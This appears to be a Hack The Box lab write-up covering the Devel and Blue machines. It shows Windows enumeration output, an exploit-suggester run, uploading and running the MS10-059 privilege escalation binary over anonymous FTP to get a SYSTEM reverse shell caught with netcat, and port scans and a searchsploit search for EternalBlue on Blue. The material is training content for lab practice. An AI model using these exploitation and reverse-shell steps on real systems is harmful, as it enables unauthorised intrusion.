TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        At logon time
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

HostName:                             DEVEL
TaskName:                             \Microsoft\Windows\WindowsColorSystem\Calibration Loader
Next Run Time:                        Disabled
Status:
Logon Mode:                           Interactive/Background
Last Run Time:                        14/7/2009 7:54:01
Last Result:                          0
Author:                               Microsoft Corporation
Task To Run:                          COM handler
Start In:                             N/A
Comment:                              This task applies color calibration settings.
Scheduled Task State:                 Disabled
Idle Time:                            Disabled
Power Management:
Run As User:                          Users
Delete Task If Not Rescheduled:       Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        When an event occurs
Start Time:                           N/A
Start Date:                           N/A
End Date:                             N/A
Days:                                 N/A
Months:                               N/A
Repeat: Every:                        N/A
Repeat: Until: Time:                  N/A
Repeat: Until: Duration:              N/A
Repeat: Stop If Still Running:        N/A

Folder: \Microsoft\Windows Defender
HostName:                             DEVEL
TaskName:                             \Microsoft\Windows Defender\MP Scheduled Scan
Next Run Time:                        14/9/2019 3:11:42
Status:                               Ready
Logon Mode:                           Interactive/Background
Last Run Time:                        N/A
Last Result:                          1
Author:                               N/A
Task To Run:                          c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
Start In:                             N/A
Comment:                              Scheduled Scan
Scheduled Task State:                 Enabled
Idle Time:                            Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes
Power Management:                     No Start On Batteries
Run As User:                          SYSTEM
Delete Task If Not Rescheduled:       Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule:                             Scheduling data is not available in this format.
Schedule Type:                        Daily
Start Time:                           3:11:42
Start Date:                           1/1/2000
End Date:                             1/1/2100
Days:                                 Every 1 day(s)
Months:                               N/A
Repeat: Every:                        Disabled
Repeat: Until: Time:                  Disabled
Repeat: Until: Duration:              Disabled
Repeat: Stop If Still Running:        Disabled

c:\windows\system32\inetsrv>tasklist /SVC
tasklist /SVC

Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
smss.exe                       264 N/A
csrss.exe                      344 N/A
wininit.exe                    384 N/A
csrss.exe                      396 N/A
winlogon.exe                   452 N/A
services.exe                   488 N/A
lsass.exe                      496 SamSs
lsm.exe                        504 N/A
svchost.exe                    608 DcomLaunch, PlugPlay, Power
svchost.exe                    672 RpcEptMapper, RpcSs
svchost.exe                    724 Audiosrv, Dhcp, eventlog, lmhosts, wscsvc
LogonUI.exe                    792 N/A
svchost.exe                    832 AudioEndpointBuilder, CscService, SysMain,
                                   TrkWks, UxSms
svchost.exe                    888 AeLookupSvc, gpsvc, iphlpsvc, LanmanServer,
                                   ProfSvc, Schedule, SENS, Themes, Winmgmt,
                                   wuauserv
svchost.exe                   1000 EventSystem, netprofm, nsi, sppuinotify,
                                   W32Time, WdiServiceHost, WinHttpAutoProxySv
svchost.exe                   1072 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc
spoolsv.exe                   1184 Spooler
svchost.exe                   1220 BFE, DPS, MpsSvc
svchost.exe                   1320 AppHostSvc
svchost.exe                   1392 FDResPub
svchost.exe                   1424 ftpsvc
VGAuthService.exe             1512 VGAuthService
vmtoolsd.exe                  1540 VMTools
svchost.exe                   1572 W3SVC, WAS
WmiPrvSE.exe                  2020 N/A
msdtc.exe                     1632 MSDTC
sppsvc.exe                    2696 sppsvc
svchost.exe                   2736 WinDefend
SearchIndexer.exe             2816 WSearch
TrustedInstaller.exe          3948 TrustedInstaller
w3wp.exe                      2584 N/A
cmd.exe                       3928 N/A
conhost.exe                   1240 N/A
tasklist.exe                  1052 N/A

c:\windows\system32\inetsrv>net start
net start
These Windows services are started:

   Application Experience
   Application Host Helper Service
   Base Filtering Engine
   COM+ Event System
   Cryptographic Services
   DCOM Server Process Launcher
   Desktop Window Manager Session Manager
   DHCP Client
   Diagnostic Policy Service
   Diagnostic Service Host
   Distributed Link Tracking Client
   Distributed Transaction Coordinator
   DNS Client
   Function Discovery Resource Publication
   Group Policy Client
   IP Helper
   Microsoft FTP Service
   Network List Service
   Network Location Awareness
   Network Store Interface Service
   Offline Files
   Plug and Play
   Power
   Print Spooler
   Remote Procedure Call (RPC)
   RPC Endpoint Mapper
   Security Accounts Manager
   Security Center
   Server
   Software Protection
   SPP Notification Service
   Superfetch
   System Event Notification Service
   Task Scheduler
   TCP/IP NetBIOS Helper
   Themes
   User Profile Service
   VMware Alias Manager and Ticket Service
   VMware Tools
   Windows Audio
   Windows Audio Endpoint Builder
   Windows Defender
   Windows Event Log
   Windows Firewall
   Windows Management Instrumentation
   Windows Modules Installer
   Windows Process Activation Service
   Windows Search
   Windows Time
   Windows Update
   WinHTTP Web Proxy Auto-Discovery Service
   Workstation
   World Wide Web Publishing Service

The command completed successfully.


c:\windows\system32\inetsrv> DRIVERQUERY
 DRIVERQUERY

Module Name  Display Name           Driver Type   Link Date
============ ====================== ============= ======================
1394ohci     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:59
ACPI         Microsoft ACPI Driver  Kernel        14/7/2009 2:11:11
AcpiPmi      ACPI Power Meter Drive Kernel        14/7/2009 2:16:36
adp94xx      adp94xx                Kernel        6/12/2008 1:59:55
adpahci      adpahci                Kernel        1/5/2007 8:29:26
adpu320      adpu320                Kernel        28/2/2007 2:03:08
AFD          Ancillary Function Dri Kernel        14/7/2009 2:12:34
agp440       Intel AGP Bus Filter   Kernel        14/7/2009 2:25:36
aic78xx      aic78xx                Kernel        12/4/2006 3:20:11
aliide       aliide                 Kernel        14/7/2009 2:11:17
amdagp       AMD AGP Bus Filter Dri Kernel        14/7/2009 2:25:36
amdide       amdide                 Kernel        14/7/2009 2:11:19
AmdK8        AMD K8 Processor Drive Kernel        14/7/2009 2:11:03
AmdPPM       AMD Processor Driver   Kernel        14/7/2009 2:11:03
amdsata      amdsata                Kernel        19/5/2009 8:54:22
amdsbs       amdsbs                 Kernel        20/3/2009 8:35:26
amdxata      amdxata                Kernel        19/5/2009 8:57:35
AppID        AppID Driver           Kernel        14/7/2009 2:36:51
arc          arc                    Kernel        25/5/2007 12:31:06
arcsas       arcsas                 Kernel        14/1/2009 9:26:37
AsyncMac     RAS Asynchronous Media Kernel        14/7/2009 2:54:46
atapi        IDE Channel            Kernel        14/7/2009 2:11:15
b06bdrv      Broadcom NetXtreme II  Kernel        14/2/2009 12:10:59
b57nd60x     Broadcom NetXtreme Gig Kernel        26/4/2009 2:15:34
Beep         Beep                   Kernel        14/7/2009 2:45:00
blbdrive     blbdrive               Kernel        14/7/2009 2:23:04
bowser       Browser Support Driver File System   14/7/2009 2:14:21
BrFiltLo     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
BrFiltUp     Brother USB Mass-Stora Kernel        7/8/2006 12:33:45
Brserid      Brother MFC Serial Por Kernel        7/8/2006 12:33:50
BrSerWdm     Brother WDM Serial dri Kernel        7/8/2006 12:33:44
BrUsbMdm     Brother MFC USB Fax On Kernel        7/8/2006 12:33:43
BrUsbSer     Brother MFC USB Serial Kernel        9/8/2006 3:02:02
BTHMODEM     Bluetooth Serial Commu Kernel        14/7/2009 2:51:34
cdfs         CD/DVD File System Rea File System   14/7/2009 2:11:14
cdrom        CD-ROM Driver          Kernel        14/7/2009 2:11:24
circlass     Consumer IR Devices    Kernel        14/7/2009 2:51:17
CLFS         Common Log (CLFS)      Kernel        14/7/2009 2:11:10
CmBatt       Microsoft AC Adapter D Kernel        14/7/2009 2:19:18
cmdide       cmdide                 Kernel        14/7/2009 2:11:18
CNG          CNG                    Kernel        14/7/2009 2:32:55
Compbatt     Microsoft Composite Ba Kernel        14/7/2009 2:19:18
CompositeBus Composite Bus Enumerat Kernel        14/7/2009 2:45:26
crcdisk      Crcdisk Filter Driver  Kernel        14/7/2009 2:46:05
CSC          Offline Files Driver   Kernel        14/7/2009 2:15:08
DfsC         DFS Namespace Client D File System   14/7/2009 2:14:16
discache     System Attribute Cache Kernel        14/7/2009 2:24:04
Disk         Disk Driver            Kernel        14/7/2009 2:11:28
DXGKrnl      LDDM Graphics Subsyste Kernel        14/7/2009 2:26:15
E1G60        Intel(R) PRO/1000 NDIS Kernel        29/5/2008 2:14:11
ebdrv        Broadcom NetXtreme II  Kernel        31/12/2008 6:06:23
elxstor      elxstor                Kernel        4/2/2009 12:09:33
ErrDev       Microsoft Hardware Err Kernel        14/7/2009 2:19:18
exfat        exFAT File System Driv File System   14/7/2009 2:14:01
fastfat      FAT12/16/32 File Syste File System   14/7/2009 2:14:01
fdc          Floppy Disk Controller Kernel        14/7/2009 2:45:45
FileInfo     File Information FS Mi File System   14/7/2009 2:21:51
Filetrace    Filetrace              File System   14/7/2009 2:15:29
flpydisk     Floppy Disk Driver     Kernel        14/7/2009 2:45:45
FltMgr       FltMgr                 File System   14/7/2009 2:11:13
FsDepends    File System Dependency File System   14/7/2009 2:15:38
fvevol       Bitlocker Drive Encryp Kernel        14/7/2009 2:13:01
gagp30kx     Microsoft Generic AGPv Kernel        14/7/2009 2:25:42
hcw85cir     Hauppauge Consumer Inf Kernel        11/5/2009 10:22:41
HDAudBus     Microsoft UAA Bus Driv Kernel        14/7/2009 2:50:55
HidBatt      HID UPS Battery Driver Kernel        14/7/2009 2:19:21
HidBth       Microsoft Bluetooth HI Kernel        14/7/2009 2:51:33
HidIr        Microsoft Infrared HID Kernel        14/7/2009 2:51:04
HidUsb       Microsoft HID Class Dr Kernel        14/7/2009 2:51:04
HpSAMD       HpSAMD                 Kernel        19/5/2009 2:42:46
HTTP         HTTP                   Kernel        14/7/2009 2:12:53
hwpolicy     Hardware Policy Driver Kernel        14/7/2009 2:11:01
i8042prt     i8042 Keyboard and PS/ Kernel        14/7/2009 2:11:23
iaStorV      iaStorV                Kernel        8/4/2009 7:54:58
iirsp        iirsp                  Kernel        13/12/2005 11:48:01
intelide     intelide               Kernel        14/7/2009 2:11:19
intelppm     Intel Processor Driver Kernel        14/7/2009 2:11:03
IpFilterDriv IP Traffic Filter Driv Kernel        14/7/2009 2:54:28
IPMIDRV      IPMIDRV                Kernel        14/7/2009 2:30:59
IPNAT        IP Network Address Tra Kernel        14/7/2009 2:54:28
IRENUM       IR Bus Enumerator      Kernel        14/7/2009 2:53:27
isapnp       isapnp                 Kernel        14/7/2009 2:19:29
iScsiPrt     iScsiPort Driver       Kernel        14/7/2009 2:46:21
kbdclass     Keyboard Class Driver  Kernel        14/7/2009 2:11:15
kbdhid       Keyboard HID Driver    Kernel        14/7/2009 2:45:09
KSecDD       KSecDD                 Kernel        14/7/2009 2:11:56
KSecPkg      KSecPkg                Kernel        14/7/2009 2:34:00
lltdio       Link-Layer Topology Di Kernel        14/7/2009 2:53:18
LSI_FC       LSI_FC                 Kernel        10/12/2008 12:28:47
LSI_SAS      LSI_SAS                Kernel        19/5/2009 3:19:55
LSI_SAS2     LSI_SAS2               Kernel        19/5/2009 3:31:29
LSI_SCSI     LSI_SCSI               Kernel        17/4/2009 1:14:47
luafv        UAC File Virtualizatio File System   14/7/2009 2:15:44
megasas      megasas                Kernel        19/5/2009 4:09:36
MegaSR       MegaSR                 Kernel        19/5/2009 4:25:17
Modem        Modem                  Kernel        14/7/2009 2:55:24
monitor      Microsoft Monitor Clas Kernel        14/7/2009 2:25:58
mouclass     Mouse Class Driver     Kernel        14/7/2009 2:11:15
mouhid       Mouse HID Driver       Kernel        14/7/2009 2:45:08
mountmgr     Mount Point Manager    Kernel        14/7/2009 2:11:27
mpio         mpio                   Kernel        14/7/2009 2:46:13
mpsdrv       Windows Firewall Autho Kernel        14/7/2009 2:52:52
MRxDAV       WebDav Client Redirect File System   14/7/2009 2:14:25
mrxsmb       SMB MiniRedirector Wra File System   14/7/2009 2:14:24
mrxsmb10     SMB 1.x MiniRedirector File System   14/7/2009 2:14:34
mrxsmb20     SMB 2.0 MiniRedirector File System   14/7/2009 2:14:29
msahci       msahci                 Kernel        14/7/2009 2:45:50
msdsm        msdsm                  Kernel        14/7/2009 2:46:19
Msfs         Msfs                   File System   14/7/2009 2:11:26
mshidkmdf    Pass-through HID to KM Kernel        14/7/2009 2:51:07
msisadrv     msisadrv               Kernel        14/7/2009 2:11:09
MsRPC        MsRPC                  Kernel        14/7/2009 2:11:59
mssmbios     Microsoft System Manag Kernel        14/7/2009 2:19:25
MTConfig     Microsoft Input Config Kernel        14/7/2009 2:46:55
Mup          Mup                    File System   14/7/2009 2:14:14
NativeWifiP  NativeWiFi Filter      Kernel        14/7/2009 2:51:59
NDIS         NDIS System Driver     Kernel        14/7/2009 2:12:24
NdisCap      NDIS Capture LightWeig Kernel        14/7/2009 2:52:44
NdisTapi     Remote Access NDIS TAP Kernel        14/7/2009 2:54:24
Ndisuio      NDIS Usermode I/O Prot Kernel        14/7/2009 2:53:51
NdisWan      Remote Access NDIS WAN Kernel        14/7/2009 2:54:34
NDProxy      NDIS Proxy             Kernel        14/7/2009 2:54:27
NetBIOS      NetBIOS Interface      File System   14/7/2009 2:53:54
NetBT        NetBT                  Kernel        14/7/2009 2:12:18
nfrd960      nfrd960                Kernel        7/6/2006 12:12:15
Npfs         Npfs                   File System   14/7/2009 2:11:31
nsiproxy     NSI proxy service driv Kernel        14/7/2009 2:12:08
Ntfs         Ntfs                   File System   14/7/2009 2:12:05
Null         Null                   Kernel        14/7/2009 2:11:12
nvraid       nvraid                 Kernel        20/5/2009 9:43:36
nvstor       nvstor                 Kernel        20/5/2009 9:44:09
nv_agp       NVIDIA nForce AGP Bus  Kernel        14/7/2009 2:25:50
ohci1394     1394 OHCI Compliant Ho Kernel        14/7/2009 2:51:29
Parport      Parallel port driver   Kernel        14/7/2009 2:45:34
partmgr      Partition Manager      Kernel        14/7/2009 2:11:35
Parvdm       Parvdm                 Kernel        14/7/2009 2:45:29
pci          PCI Bus Driver         Kernel        14/7/2009 2:11:16
pciide       pciide                 Kernel        14/7/2009 2:11:19
pcmcia       pcmcia                 Kernel        14/7/2009 2:19:29
pcw          Performance Counters f Kernel        14/7/2009 2:11:10
PEAUTH       PEAUTH                 Kernel        14/7/2009 3:35:44
PptpMiniport WAN Miniport (PPTP)    Kernel        14/7/2009 2:54:47
Processor    Processor Driver       Kernel        14/7/2009 2:11:03
Psched       QoS Packet Scheduler   Kernel        14/7/2009 2:53:58
pvscsi       pvscsi Storage Control Kernel        26/1/2016 1:15:17
ql2300       ql2300                 Kernel        23/1/2009 1:28:52
ql40xx       ql40xx                 Kernel        19/5/2009 4:17:31
RasAcd       Remote Access Auto Con Kernel        14/7/2009 2:54:40
RasAgileVpn  WAN Miniport (IKEv2)   Kernel        14/7/2009 2:55:00
Rasl2tp      WAN Miniport (L2TP)    Kernel        14/7/2009 2:54:33
RasPppoe     Remote Access PPPOE Dr Kernel        14/7/2009 2:54:53
RasSstp      WAN Miniport (SSTP)    Kernel        14/7/2009 2:54:57
rdbss        Redirected Buffering S File System   14/7/2009 2:14:26
rdpbus       Remote Desktop Device  Kernel        14/7/2009 3:02:40
RDPCDD       RDPCDD                 Kernel        14/7/2009 3:01:40
RDPDR        Terminal Server Device Kernel        14/7/2009 3:02:56
RDPENCDD     RDP Encoder Mirror Dri Kernel        14/7/2009 3:01:39
RDPREFMP     Reflector Display Driv Kernel        14/7/2009 3:01:41
RDPWD        RDP Winstation Driver  Kernel        14/7/2009 3:01:50
rdyboost     ReadyBoost             Kernel        14/7/2009 2:22:02
rspndr       Link-Layer Topology Di Kernel        14/7/2009 2:53:20
s3cap        s3cap                  Kernel        14/7/2009 2:28:46
sbp2port     sbp2port               Kernel        14/7/2009 2:11:28
scfilter     Smart card PnP Class F Kernel        14/7/2009 2:33:50
Serenum      Serenum Filter Driver  Kernel        14/7/2009 2:45:27
Serial       Serial Port Driver     Kernel        14/7/2009 2:45:33
sermouse     Serial Mouse Driver    Kernel        14/7/2009 2:45:08
sffdisk      SFF Storage Class Driv Kernel        14/7/2009 2:45:52
sffp_mmc     SFF Storage Protocol D Kernel        14/7/2009 2:45:52
sffp_sd      SFF Storage Protocol D Kernel        14/7/2009 2:45:51
sfloppy      High-Capacity Floppy D Kernel        14/7/2009 2:45:52
sisagp       SIS AGP Bus Filter     Kernel        14/7/2009 2:25:35
SiSRaid2     SiSRaid2               Kernel        24/9/2008 9:19:45
SiSRaid4     SiSRaid4               Kernel        2/10/2008 12:52:22
Smb          Message-oriented TCP/I Kernel        14/7/2009 2:53:39
spldr        Security Processor Loa Kernel        11/5/2009 7:13:47
srv          Server SMB 1.xxx Drive File System   14/7/2009 2:15:10
srv2         Server SMB 2.xxx Drive File System   14/7/2009 2:14:52
srvnet       srvnet                 File System   14/7/2009 2:14:45
stexstor     stexstor               Kernel        18/2/2009 1:03:21
storflt      Disk Virtual Machine B Kernel        14/7/2009 2:28:44
storvsc      storvsc                Kernel        14/7/2009 2:28:44
swenum       Software Bus Driver    Kernel        14/7/2009 2:45:08
Tcpip        TCP/IP Protocol Driver Kernel        14/7/2009 2:13:18
TCPIP6       Microsoft IPv6 Protoco Kernel        14/7/2009 2:13:18
tcpipreg     TCP/IP Registry Compat Kernel        14/7/2009 2:54:14
TDPIPE       TDPIPE                 Kernel        14/7/2009 3:01:36
TDTCP        TDTCP                  Kernel        14/7/2009 3:01:37
tdx          NetIO Legacy TDI Suppo Kernel        14/7/2009 2:12:10
TermDD       Terminal Device Driver Kernel        14/7/2009 3:01:35
tssecsrv     Remote Desktop Service Kernel        14/7/2009 3:01:50
tunnel       Microsoft Tunnel Minip Kernel        14/7/2009 2:54:03
uagp35       Microsoft AGPv3.5 Filt Kernel        14/7/2009 2:25:40
udfs         udfs                   File System   14/7/2009 2:14:09
uliagpkx     Uli AGP Bus Filter     Kernel        14/7/2009 2:25:47
umbus        UMBus Enumerator Drive Kernel        14/7/2009 2:51:38
UmPass       Microsoft UMPass Drive Kernel        14/7/2009 2:51:35
usbccgp      Microsoft USB Generic  Kernel        14/7/2009 2:51:31
usbcir       eHome Infrared Receive Kernel        14/7/2009 2:51:18
usbehci      Microsoft USB 2.0 Enha Kernel        14/7/2009 2:51:14
usbhub       Microsoft USB Standard Kernel        14/7/2009 2:52:06
usbohci      Microsoft USB Open Hos Kernel        14/7/2009 2:51:14
usbprint     Microsoft USB PRINTER  Kernel        14/7/2009 3:17:06
USBSTOR      USB Mass Storage Drive Kernel        14/7/2009 2:51:19
usbuhci      Microsoft USB Universa Kernel        14/7/2009 2:51:10
vdrvroot     Microsoft Virtual Driv Kernel        14/7/2009 2:46:19
vga          vga                    Kernel        14/7/2009 2:25:49
VgaSave      VgaSave                Kernel        14/7/2009 2:25:50
vhdmp        vhdmp                  Kernel        14/7/2009 2:46:25
viaagp       VIA AGP Bus Filter     Kernel        14/7/2009 2:25:39
ViaC7        VIA C7 Processor Drive Kernel        14/7/2009 2:11:03
viaide       viaide                 Kernel        14/7/2009 2:11:20
vm3dmp       vm3dmp                 Kernel        14/12/2016 12:32:48
vmbus        Virtual Machine Bus    Kernel        14/7/2009 2:28:53
VMBusHID     VMBusHID               Kernel        14/7/2009 2:28:45
vmci         VMware VMCI Bus Driver Kernel        4/6/2016 11:06:29
VMMemCtl     Memory Control Driver  Kernel        5/3/2016 1:15:45
vmmouse      VMware Pointing Device Kernel        20/2/2016 1:14:08
volmgr       Volume Manager Driver  Kernel        14/7/2009 2:11:25
volmgrx      Dynamic Volume Manager Kernel        14/7/2009 2:11:41
volsnap      Storage volumes        Kernel        14/7/2009 2:11:34
vsmraid      vsmraid                Kernel        31/1/2009 3:13:29
vsock        vSockets Virtual Machi Kernel        22/6/2016 11:07:52
vwifibus     Virtual WiFi Bus Drive Kernel        14/7/2009 2:52:02
WacomPen     Wacom Serial Pen HID D Kernel        14/7/2009 2:46:53
WANARP       Remote Access IP ARP D Kernel        14/7/2009 2:55:02
Wanarpv6     Remote Access IPv6 ARP Kernel        14/7/2009 2:55:02
Wd           Wd                     Kernel        14/7/2009 2:11:31
Wdf01000     Kernel Mode Driver Fra Kernel        14/7/2009 2:11:36
WfpLwf       WFP Lightweight Filter Kernel        14/7/2009 2:53:51
WIMMount     WIMMount               File System   14/7/2009 2:17:57
WmiAcpi      Microsoft Windows Mana Kernel        14/7/2009 2:19:16
ws2ifsl      Windows Socket 2.0 Non Kernel        14/7/2009 2:55:01
WudfPf       User Mode Driver Frame Kernel        14/7/2009 2:50:13

c:\windows\system32\inetsrv>

Exploit Suggester

Devel Machine

C:> systeminfo > systeminfo.txt

Kalibox

#  ./windows-exploit-suggester.py --database 2019-09-10-mssb.xls --systeminfo systeminfo.txt[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Working Exploit

MS10-059 worked and I got the binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe.

On Kalibox

ftp 10.10.10..5

Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> put  MS10-059.exe

Devel Machine

c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444

On Kalibox

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.c:\inetpub\wwwroot>whoami
whoami
nt authority\system

Hack The Box - Blue

September 8, 2019•1534 words

Box Details

Blue

OS	DIFFICULTY	POINTS
Windows	EASY	20

ENUMERATION

Inital Port Scanning

masscan

To speed things up I am going to run masscan to get the inital port avaliability.

COMMAND

masscan -p1-65535,U:1-65535 10.10.10.40 --rate=1000 -e tun0 -oG masscan-Blue

RESULT

# Masscan 1.0.5 scan initiated Sun Sep  8 08:11:45 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.40 ()    Ports: 135/open/tcp////
Host: 10.10.10.40 ()    Ports: 49154/open/tcp////
Host: 10.10.10.40 ()    Ports: 445/open/tcp////
Host: 10.10.10.40 ()    Ports: 49155/open/tcp////
# Masscan done at Sun Sep  8 08:18:18 2019

nmap

Ports avaiable for nmap scanning:

135
49254
445
41955

COMMAND

nmap -sC -sV -p135,49253,445,41955 -oA nmap-Blue 10.10.10.40

RESULT

Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-08 09:22 BST
Nmap scan report for 10.10.10.40
Host is up (0.041s latency).

PORT      STATE  SERVICE      VERSION
135/tcp   open   msrpc        Microsoft Windows RPC
445/tcp   open   microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
41955/tcp closed unknown
49253/tcp closed unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -21m12s, deviation: 34m37s, median: -1m13s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-09-08T09:21:37+01:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-09-08T08:21:39
|_  start_date: 2019-09-08T07:59:13

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.52 seconds

Port Scan Summary

Server IP	OPEN TCP PORTS	OPEN UDP PORTS
10.10.10.40	135,445	N/A

EXPLOITS

Exploit Search

Use searchsploit to investigate expoloits for Windows 7 SP1 and smb.
COMMAND

#  searchsploit windows 7 smb

RESULT

----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                       |  Path
                                                                                                                                                     | (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)                                                                                        | exploits/windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)                                                      | exploits/windows/remote/16366.rb
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                            | exploits/windows/remote/43970.rb
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)                                                         | exploits/windows/remote/14674.txt
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)                                                                      | exploits/windows/dos/40744.txt
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                        | exploits/windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service                                                                        | exploits/windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068)                                                                                                 | exploits/windows/remote/7125.txt
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation                                                          | exploits/windows/local/47115.txt
**Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                     | exploits/windows/remote/42031.py**
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)                                                                      | exploits/windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                 | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                           | exploits/windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal                                                                        | exploits/windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client                                                        | exploits/windows/remote/19197.txt
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation                                                        | exploits/windows/dos/43517.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                                        | exploits/windows_x86-64/remote/41987.py
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)                                                 | exploits/windows/dos/9594.txt
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)                                                            | exploits/windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)                                                            | exploits/windows/dos/21747.txt
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)                                                                        | exploits/windows_x86/local/16678.rb
VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)                                                                  | exploits/windows/dos/9427.py
----------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

